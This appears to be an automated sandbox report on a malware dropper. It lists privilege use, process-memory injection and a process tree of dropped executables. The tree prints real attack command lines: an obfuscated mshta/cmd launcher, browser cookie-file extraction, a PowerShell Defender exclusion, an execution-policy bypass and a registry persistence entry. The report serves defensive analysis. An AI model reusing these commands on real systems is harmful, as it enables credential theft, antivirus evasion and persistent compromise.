Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	1656	wpjiSuP2zkRSF5LjZiDIMr7J.exe
Token: SeDebugPrivilege	3524	WerFault.exe
Token: SeDebugPrivilege	4220	5XHdUK3CmLKAHDrBaHQzFR94.exe
Token: SeDebugPrivilege	488	8011660.exe
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeDebugPrivilege	3644	3187448.exe
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeShutdownPrivilege	2824
Token: SeCreatePagefilePrivilege	2824
Token: SeCreateTokenPrivilege	5856	askinstall53.exe
Token: SeAssignPrimaryTokenPrivilege	5856	askinstall53.exe
Token: SeLockMemoryPrivilege	5856	askinstall53.exe
Token: SeIncreaseQuotaPrivilege	5856	askinstall53.exe
Token: SeMachineAccountPrivilege	5856	askinstall53.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

VU1EDKbEK8gfqyvnCHOs4E4z.tmpCleaner Installation.exeInlog.tmpEsplorarne.exe.comtapinstall.exe

pid process

4760 VU1EDKbEK8gfqyvnCHOs4E4z.tmp
5704 Cleaner Installation.exe
5804 Inlog.tmp
6048 Esplorarne.exe.com
2824
2824
6140 tapinstall.exe

pid	process
4760	VU1EDKbEK8gfqyvnCHOs4E4z.tmp
5704	Cleaner Installation.exe
5804	Inlog.tmp
6048	Esplorarne.exe.com
2824
2824
6140	tapinstall.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (16).exe

description	pid	process	target process
PID 3892 wrote to memory of 4012	3892	Setup (16).exe	onR8itfYViCRadwknZWvxq1a.exe
PID 3892 wrote to memory of 4012	3892	Setup (16).exe	onR8itfYViCRadwknZWvxq1a.exe
PID 3892 wrote to memory of 4012	3892	Setup (16).exe	onR8itfYViCRadwknZWvxq1a.exe
PID 3892 wrote to memory of 1068	3892	Setup (16).exe	7L7SmCmxZBuK866H9J56dZ9i.exe
PID 3892 wrote to memory of 1068	3892	Setup (16).exe	7L7SmCmxZBuK866H9J56dZ9i.exe
PID 3892 wrote to memory of 1068	3892	Setup (16).exe	7L7SmCmxZBuK866H9J56dZ9i.exe
PID 3892 wrote to memory of 3276	3892	Setup (16).exe	knDM9K2WuDIgPpvZTz7iJyiv.exe
PID 3892 wrote to memory of 3276	3892	Setup (16).exe	knDM9K2WuDIgPpvZTz7iJyiv.exe
PID 3892 wrote to memory of 3276	3892	Setup (16).exe	knDM9K2WuDIgPpvZTz7iJyiv.exe
PID 3892 wrote to memory of 1072	3892	Setup (16).exe	wYHXVXkFz5ne2Vq6ab0DG5k3.exe
PID 3892 wrote to memory of 1072	3892	Setup (16).exe	wYHXVXkFz5ne2Vq6ab0DG5k3.exe
PID 3892 wrote to memory of 1072	3892	Setup (16).exe	wYHXVXkFz5ne2Vq6ab0DG5k3.exe
PID 3892 wrote to memory of 3744	3892	Setup (16).exe	pmraugcfGvbfWwNKMGckSwss.exe
PID 3892 wrote to memory of 3744	3892	Setup (16).exe	pmraugcfGvbfWwNKMGckSwss.exe
PID 3892 wrote to memory of 3744	3892	Setup (16).exe	pmraugcfGvbfWwNKMGckSwss.exe
PID 3892 wrote to memory of 3728	3892	Setup (16).exe	YfaqickjSQEwGsn4tTZyes3_.exe
PID 3892 wrote to memory of 3728	3892	Setup (16).exe	YfaqickjSQEwGsn4tTZyes3_.exe
PID 3892 wrote to memory of 3728	3892	Setup (16).exe	YfaqickjSQEwGsn4tTZyes3_.exe
PID 3892 wrote to memory of 2560	3892	Setup (16).exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
PID 3892 wrote to memory of 2560	3892	Setup (16).exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
PID 3892 wrote to memory of 2560	3892	Setup (16).exe	P2jRvKFkhoFqiCE2FzuSofFu.exe
PID 3892 wrote to memory of 2676	3892	Setup (16).exe	8N7tugtAoWe9lbLX05F7nk6f.exe
PID 3892 wrote to memory of 2676	3892	Setup (16).exe	8N7tugtAoWe9lbLX05F7nk6f.exe
PID 3892 wrote to memory of 2676	3892	Setup (16).exe	8N7tugtAoWe9lbLX05F7nk6f.exe
PID 3892 wrote to memory of 1656	3892	Setup (16).exe	wpjiSuP2zkRSF5LjZiDIMr7J.exe
PID 3892 wrote to memory of 1656	3892	Setup (16).exe	wpjiSuP2zkRSF5LjZiDIMr7J.exe
PID 3892 wrote to memory of 1656	3892	Setup (16).exe	wpjiSuP2zkRSF5LjZiDIMr7J.exe
PID 3892 wrote to memory of 2680	3892	Setup (16).exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
PID 3892 wrote to memory of 2680	3892	Setup (16).exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
PID 3892 wrote to memory of 2680	3892	Setup (16).exe	p677u7IwPoa5s4gcdt8zN2Yk.exe
PID 3892 wrote to memory of 3172	3892	Setup (16).exe	ZleAaxLiBY5xMwGlObFp_7l2.exe
PID 3892 wrote to memory of 3172	3892	Setup (16).exe	ZleAaxLiBY5xMwGlObFp_7l2.exe
PID 3892 wrote to memory of 3172	3892	Setup (16).exe	ZleAaxLiBY5xMwGlObFp_7l2.exe
PID 3892 wrote to memory of 192	3892	Setup (16).exe	888qQtt12NDSY2tU8zniAWFT.exe
PID 3892 wrote to memory of 192	3892	Setup (16).exe	888qQtt12NDSY2tU8zniAWFT.exe
PID 3892 wrote to memory of 192	3892	Setup (16).exe	888qQtt12NDSY2tU8zniAWFT.exe
PID 3892 wrote to memory of 1308	3892	Setup (16).exe	sYC7WokZSkdkVMNtIgLEIsRL.exe
PID 3892 wrote to memory of 1308	3892	Setup (16).exe	sYC7WokZSkdkVMNtIgLEIsRL.exe
PID 3892 wrote to memory of 1308	3892	Setup (16).exe	sYC7WokZSkdkVMNtIgLEIsRL.exe
PID 3892 wrote to memory of 3252	3892	Setup (16).exe	OlLnyMjDYM2HF94iR5guLlDE.exe
PID 3892 wrote to memory of 3252	3892	Setup (16).exe	OlLnyMjDYM2HF94iR5guLlDE.exe
PID 3892 wrote to memory of 3252	3892	Setup (16).exe	OlLnyMjDYM2HF94iR5guLlDE.exe
PID 3892 wrote to memory of 3724	3892	Setup (16).exe	8VmzjVht_DClLCJG_RJh5V4E.exe
PID 3892 wrote to memory of 3724	3892	Setup (16).exe	8VmzjVht_DClLCJG_RJh5V4E.exe
PID 3892 wrote to memory of 3724	3892	Setup (16).exe	8VmzjVht_DClLCJG_RJh5V4E.exe
PID 3892 wrote to memory of 776	3892	Setup (16).exe	4tMCbZ0yGruE8d0Ny9jeWOfq.exe
PID 3892 wrote to memory of 776	3892	Setup (16).exe	4tMCbZ0yGruE8d0Ny9jeWOfq.exe
PID 3892 wrote to memory of 1928	3892	Setup (16).exe	xvTYZ1hjTDj5Rr5UfraK7e1b.exe
PID 3892 wrote to memory of 1928	3892	Setup (16).exe	xvTYZ1hjTDj5Rr5UfraK7e1b.exe
PID 3892 wrote to memory of 1928	3892	Setup (16).exe	xvTYZ1hjTDj5Rr5UfraK7e1b.exe
PID 3892 wrote to memory of 1316	3892	Setup (16).exe	0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
PID 3892 wrote to memory of 1316	3892	Setup (16).exe	0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
PID 3892 wrote to memory of 2716	3892	Setup (16).exe	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
PID 3892 wrote to memory of 2716	3892	Setup (16).exe	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
PID 3892 wrote to memory of 2716	3892	Setup (16).exe	aSn9fqpqDhGYu3GbZ1S1TS6I.exe
PID 3892 wrote to memory of 2892	3892	Setup (16).exe	dsmuEcIl37bzLp4Drmm1l74f.exe
PID 3892 wrote to memory of 2892	3892	Setup (16).exe	dsmuEcIl37bzLp4Drmm1l74f.exe
PID 3892 wrote to memory of 2892	3892	Setup (16).exe	dsmuEcIl37bzLp4Drmm1l74f.exe
PID 3892 wrote to memory of 3748	3892	Setup (16).exe	YtjpPTrrwUN8IYNue5FqWCqm.exe
PID 3892 wrote to memory of 3748	3892	Setup (16).exe	YtjpPTrrwUN8IYNue5FqWCqm.exe
PID 3892 wrote to memory of 3748	3892	Setup (16).exe	YtjpPTrrwUN8IYNue5FqWCqm.exe
PID 3892 wrote to memory of 3440	3892	Setup (16).exe	GFXV5uf_XQa804CDnoWH0M3p.exe
PID 3892 wrote to memory of 3440	3892	Setup (16).exe	GFXV5uf_XQa804CDnoWH0M3p.exe
PID 3892 wrote to memory of 3440	3892	Setup (16).exe	GFXV5uf_XQa804CDnoWH0M3p.exe

C:\Users\Admin\AppData\Local\Temp\Setup (16).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3892

C:\Users\Admin\Documents\onR8itfYViCRadwknZWvxq1a.exe
"C:\Users\Admin\Documents\onR8itfYViCRadwknZWvxq1a.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1140
3⤵
- Program crash
PID:5512

C:\Users\Admin\Documents\pmraugcfGvbfWwNKMGckSwss.exe
"C:\Users\Admin\Documents\pmraugcfGvbfWwNKMGckSwss.exe"
2⤵
- Executes dropped EXE
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 896
3⤵
- Program crash
PID:4508

C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe
"C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"
2⤵
- Executes dropped EXE
PID:1072

C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe
"C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"
3⤵
PID:1544

C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe
"C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe"
2⤵
- Executes dropped EXE
PID:3276

C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe
C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4692

C:\Users\Admin\Documents\7L7SmCmxZBuK866H9J56dZ9i.exe
"C:\Users\Admin\Documents\7L7SmCmxZBuK866H9J56dZ9i.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe
"C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3728

C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe
"C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3712

C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe
"C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe
"C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"
3⤵
- Executes dropped EXE
PID:3860

C:\Users\Admin\Documents\P2jRvKFkhoFqiCE2FzuSofFu.exe
"C:\Users\Admin\Documents\P2jRvKFkhoFqiCE2FzuSofFu.exe"
2⤵
- Executes dropped EXE
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 676
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 632
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 660
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1132
3⤵
- Program crash
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1176
3⤵
- Program crash
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 1152
3⤵
- Program crash
PID:6032

C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe
"C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3172

C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe
C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Users\Admin\Documents\p677u7IwPoa5s4gcdt8zN2Yk.exe
"C:\Users\Admin\Documents\p677u7IwPoa5s4gcdt8zN2Yk.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2680

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:4436

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:4476

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5388

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:6092

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4172

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:4400

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:3812

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:7540

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:10172

C:\Users\Admin\Documents\wpjiSuP2zkRSF5LjZiDIMr7J.exe
"C:\Users\Admin\Documents\wpjiSuP2zkRSF5LjZiDIMr7J.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe
"C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe"
2⤵
- Executes dropped EXE
PID:3252

C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe
"C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe
"C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"
2⤵
- Executes dropped EXE
PID:192

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
3⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe" ) do taskkill -f -iM "%~NxA"
4⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
5⤵
- Executes dropped EXE
PID:1472

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
6⤵
PID:3844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
7⤵
PID:4896

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
6⤵
PID:3756

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "888qQtt12NDSY2tU8zniAWFT.exe"
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe
"C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe"
2⤵
- Executes dropped EXE
PID:1928

C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe
"C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe" -q
3⤵
- Executes dropped EXE
PID:4832

C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe
"C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Users\Admin\AppData\Roaming\6641540.exe
"C:\Users\Admin\AppData\Roaming\6641540.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Users\Admin\AppData\Roaming\3187448.exe
"C:\Users\Admin\AppData\Roaming\3187448.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Users\Admin\AppData\Roaming\8011660.exe
"C:\Users\Admin\AppData\Roaming\8011660.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:488

C:\Users\Admin\AppData\Roaming\1486191.exe
"C:\Users\Admin\AppData\Roaming\1486191.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:304

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:5424

C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe
"C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
"C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe
"C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2716

C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe
C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Users\Admin\Documents\YtjpPTrrwUN8IYNue5FqWCqm.exe
"C:\Users\Admin\Documents\YtjpPTrrwUN8IYNue5FqWCqm.exe"
2⤵
- Executes dropped EXE
PID:3748

C:\Users\Admin\Documents\dsmuEcIl37bzLp4Drmm1l74f.exe
"C:\Users\Admin\Documents\dsmuEcIl37bzLp4Drmm1l74f.exe"
2⤵
- Executes dropped EXE
PID:2892

C:\Users\Admin\Documents\fIAkXcZipnfF7F6wfSKwz046.exe
"C:\Users\Admin\Documents\fIAkXcZipnfF7F6wfSKwz046.exe"
2⤵
- Executes dropped EXE
PID:3784

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,s C:\Users\Admin\DOCUME~1\FIAKXC~1.EXE
3⤵
PID:7456

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,kD5SUQ==
4⤵
PID:7416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL
5⤵
PID:5540

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,bCtAVzM1aw==
5⤵
PID:8320

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
6⤵
PID:8956

C:\Windows\system32\ctfmon.exe
ctfmon.exe
7⤵
PID:9024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpFB74.tmp.ps1"
5⤵
PID:9184

C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe
"C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3440

C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe
"C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe"
2⤵
PID:4604

C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe
"C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Users\Admin\Documents\Hke7Np3HCf3BHr3IQJqdiMka.exe
"C:\Users\Admin\Documents\Hke7Np3HCf3BHr3IQJqdiMka.exe"
2⤵
- Executes dropped EXE
PID:4148

C:\Users\Admin\AppData\Local\Temp\is-SRLPN.tmp\VU1EDKbEK8gfqyvnCHOs4E4z.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SRLPN.tmp\VU1EDKbEK8gfqyvnCHOs4E4z.tmp" /SL5="$3027C,138429,56832,C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4760

C:\Users\Admin\AppData\Local\Temp\is-MU90T.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MU90T.tmp\Setup.exe" /Verysilent
2⤵
PID:5352

C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
3⤵
- Executes dropped EXE
PID:5636

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
3⤵
- Executes dropped EXE
PID:5676

C:\Users\Admin\AppData\Local\Temp\is-DEBSG.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DEBSG.tmp\Inlog.tmp" /SL5="$202E6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5804

C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
5⤵
PID:7636

C:\Users\Admin\AppData\Local\Temp\is-D9TNV.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D9TNV.tmp\Setup.tmp" /SL5="$504B4,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
6⤵
PID:7820

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\microsoft.cab -F:* %ProgramData%
7⤵
PID:5896

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\microsoft.cab -F:* C:\ProgramData
8⤵
PID:1828

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
7⤵
PID:6404

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
8⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler"
7⤵
PID:8340

C:\Windows\SysWOW64\cmd.exe
